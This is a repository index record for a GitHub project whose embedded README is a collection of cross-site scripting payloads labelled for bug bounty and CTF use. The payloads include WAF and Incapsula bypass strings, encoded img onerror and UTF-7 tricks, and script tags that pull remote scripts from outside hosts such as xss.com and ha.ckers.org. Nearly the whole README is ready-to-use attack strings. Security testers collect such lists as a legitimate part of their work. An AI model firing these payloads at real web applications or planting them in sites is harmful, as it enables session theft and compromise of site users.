{"id":13842519,"url":"https://github.com/R0X4R/D4rkXSS","last_synced_at":"2025-07-11T15:31:57.725Z","repository":{"id":112594300,"uuid":"211827289","full_name":"R0X4R/D4rkXSS","owner":"R0X4R","description":"A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF","archived":false,"fork":false,"pushed_at":"2020-03-29T07:55:48.000Z","size":1268,"stargazers_count":161,"open_issues_count":0,"forks_count":54,"subscribers_count":7,"default_branch":"master","last_synced_at":"2024-11-16T02:04:54.444Z","etag":null,"topics":["bugbounty","bughunter","bughunting","ethical-hacking","hacking","javascript","xss-exploitation","xss-filter","xss-vulnerability"],"latest_commit_sha":null,"homepage":"https://github.com/R0X4R/D4rkXSS","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/R0X4R.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2019-09-30T09:45:22.000Z","updated_at":"2024-10-13T11:01:31.000Z","dependencies_parsed_at":"2023-04-04T02:17:47.348Z","dependency_job_id":null,"html_url":"https://github.com/R0X4R/D4rkXSS","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2FD4rkXSS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2FD4rkXSS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2FD4rkXSS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2FD4rkXSS/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/R0X4R","download_url":"https://codeload.github.com/R0X4R/D4rkXSS/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225736920,"owners_count":17516257,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bughunter","bughunting","ethical-hacking","hacking","javascript","xss-exploitation","xss-filter","xss-vulnerability"],"created_at":"2024-08-04T17:01:38.646Z","updated_at":"2024-11-21T13:30:38.396Z","avatar_url":"https://github.com/R0X4R.png","language":null,"funding_links":[],"categories":["Others (1002)","Others"],"sub_categories":[],"readme":"# D4rkXSS\n\u003cbr/\u003e\n\u003cp align=\"center\"\u003e\n\t\u003cimg src=\"https://github.com/R0X4R/D4rkXSS/blob/master/imdge.png\"\u003e\u003cbr/\u003e\nAll in one place for XSS.\u003cbr/\u003e \u003ca href=\"https://eshansingh.in/\"\u003eR0X4R\u003c/a\u003e\u003c/p\u003e\n\n# Contribution\nThis is an open source repo. Anyone can contribute. :beers: \u003cbr/\u003e\n\t[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/R0X4R)\n\n## Bypass WAF\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/noscript.txt\"\u003eNO SCRIPT\u003c/a\u003e\u003cbr/\u003e\n\u003cli\u003eFor Example:\u003c/li\u003e\n\n```js\n\u003cacronym\u003e\u003cp title=\"\u003c/#{endtag}\u003e\u003csvg/onload=alert(#{starttag})\u003e\"\u003e\n\u003cbgsound\u003e\u003cp title=\"\u003c/#{endtag}\u003e\u003csvg/onload=alert(#{starttag})\u003e\"\u003e\n\u003cxmp\u003e\u003cp title=\"\u003c/#{endtag}\u003e\u003csvg/onload=alert(#{starttag})\u003e\"\u003e\n\"\u003e'\u003e\u003cdetails/open/ontoggle=confirm('XSS')\u003e\nincapsula bypass: \u003ciframe/onload=\"var b ='document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;this['src']=a\"\u003e\n```\n\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/brutelogic.txt\"\u003eBrutelogic\u003c/a\u003e\u003cbr/\u003e\n\u003cli\u003eFor Example:\u003c/li\u003e\n\n```\n\\'-alert(1)//\n\u003c/script\u003e\u003csvg onload=alert(1)\u003e\n\u003cx contenteditable onblur=alert(1)\u003elose focus!\n```\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/fuzz.txt\"\u003eFuzz3r\u003c/a\u003e\u003cbr/\u003e\n\u003cli\u003eFor Example:\u003c/li\u003e\n\n```\n#getURL,javascript:alert(1)\",\n#goto,javascript:alert(1)\",\t\n?javascript:alert(1)\",\n\n```\n## IMG Error\n\u003cli\u003eEncoding\u003c/li\u003e\n\n```\n\u003cimg onerror=\"location='javascript:=lert(1)'\" src=\"x\"\u003e\n\u003cimg onerror=\"location='javascript:%61lert(1)'\" src=\"x\"\u003e\n\u003cimg onerror=\"location='javascript:\\x2561lert(1)'\" src=\"x\"\u003e\n\u003cimg onerror=\"location='javascript:\\x255Cu0061lert(1)'\" src=\"x\" \u003e\n```\n\n\n## Jhaddix\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/jhaddix.txt\"\u003eJhaddix\u003c/a\u003e\u003cbr/\u003e\n\u003cli\u003eFor Example:\u003c/li\u003e\n\n```\n'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E\n\u003c\u003cscr\\0ipt/src=http://xss.com/xss.js\u003e\u003c/script\n%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E\n' onmouseover=alert(/Black.Spook/)\n\n```\n\n## RSnake\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/rsnake.txt\"\u003eRSnake\u003c/a\u003e\u003cbr/\u003e\n\u003cli\u003eFor Example:\u003c/li\u003e\n\n```\n\u003cSCRIPT\u003ealert('XSS');\u003c/SCRIPT\u003e\n'';!--\"\u003cXSS\u003e=\u0026{()}\n\u003cSCRIPT SRC=http://ha.ckers.org/xss.js\u003e\u003c/SCRIPT\u003e\n\n```\n\n## MarioXSS\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/mario.txt\"\u003eMario\u003c/a\u003e\u003cbr/\u003e\n\u003cli\u003eFor Example:\u003c/li\u003e\n\n```\n\u003cdiv id=\"1\"\u003e\u003cform id=\"test\"\u003e\u003c/form\u003e\u003cbutton form=\"test\" formaction=\"javascript:alert(1)\"\u003eX\u003c/button\u003e//[\"'`--\u003e]]\u003e]\u003c/div\u003e\u003cdiv id=\"2\"\u003e\u003cmeta charset=\"x-imap4-modified-utf7\"\u003e\u0026ADz\u0026AGn\u0026AG0\u0026AEf\u0026ACA\u0026AHM\u0026AHI\u0026AGO\u0026AD0\u0026AGn\u0026ACA\u0026AG8Abg\u0026AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ\u0026ACAAPABi//[\"'`--\u003e]]\u003e]\u003c/div\u003e\u003cdiv id=\"3\"\u003e\u003cmeta charset=\"x-imap4-modified-utf7\"\u003e\u0026\u003cscript\u0026S1\u0026TS\u00261\u003ealert\u0026A7\u0026(1)\u0026R\u0026UA;\u0026\u0026\u003c\u0026A9\u002611/script\u0026X\u0026\u003e//[\"'`--\u003e]]\u003e]\u003c/div\u003e\u003cdiv id=\"4\"\u003e0?\u003cscript\u003e\n```\n## Search Engine XSS\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/seXSS.md\"\u003eseXSS\u003c/a\u003e\u003cbr/\u003e\n\n## Misc Payloads\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/Misc.md\"\u003eMisc\u003c/a\u003e\u003cbr/\u003e\n\n## Basic Payloads\n\u003ca href=\"https://github.com/R0X4R/D4rkXSS/blob/master/basicxss.txt\"\u003eBasic\u003c/a\u003e\u003cbr/\u003e\n\u003cli\u003eFor Example:\u003c/li\u003e\n\n```\n\u003cscript\u003ealert('1')\u003c/script\u003e\n\"\u003e\u003cscript\u003ealert('1')\u003c/script\u003e\n\u003csvg/onload=alert('1');\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FR0X4R%2FD4rkXSS","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FR0X4R%2FD4rkXSS","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FR0X4R%2FD4rkXSS/lists"}